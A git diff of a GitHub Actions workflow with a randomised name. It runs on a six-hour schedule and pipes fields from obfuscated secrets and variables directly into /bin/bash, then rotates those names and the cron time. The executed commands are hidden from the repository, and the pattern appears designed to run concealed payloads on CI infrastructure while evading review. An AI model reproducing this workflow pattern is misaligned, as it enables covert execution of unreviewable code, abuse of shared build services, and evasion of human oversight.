--- a/.github/workflows/wanyiedud.yml
+++ b/.github/workflows/wanyiedud.yml
@@ -2,29 +2,20 @@ name: wanyiedud
 on:
   workflow_dispatch:
   schedule:
-    - cron: '6 0/6 * * *'
+    - cron: '9 3/6 * * *'
+
 jobs:
   build:
     runs-on: ubuntu-latest
-
     steps:
       - uses: actions/checkout@v4
       - name: wanyiedud
         env:
-          kb2: ${{ secrets.kb2 }}
+          ncc40: ${{ secrets.ncc40 }}
         run: |
-          echo $kb2 | jq -r .kposp4 | /bin/bash
-          echo $hup12712 | jq -r .k75103 | /bin/bash
-          echo $s7221 | jq -r .peiim49488 | /bin/bash
-          echo $qotwz92863 | jq -r .tr673 | /bin/bash
-          echo $s96135 | jq -r .qws0 | /bin/bash
-          echo $f9 | jq -r .fpcka495 | /bin/bash
-          echo $y64584 | jq -r .dpq779 | /bin/bash
-          echo $kedg3 | jq -r .pd43 | /bin/bash
-          echo $uk6788 | jq -r .d5758 | /bin/bash
-          echo $agn1 | jq -r .zf812 | /bin/bash
-          echo $rla42526 | jq -r .wgms520 | /bin/bash
-          echo $i200 | jq -r .r15 | /bin/bash
-          echo $smpw54 | jq -r .q4 | /bin/bash
-          echo $dcfdd68 | jq -r .klzbf24 | /bin/bash
+          echo $ncc40 | jq -r .m27 | /bin/bash
+          echo $ds39362 | jq -r .y5404 | /bin/bash
+          echo $co2739 | jq -r .qjx0874 | /bin/bash
+          echo $ozjlu2 | jq -r .r18907 | /bin/bash
+          echo $zeqwl041 | jq -r .dth30 | /bin/bash
 
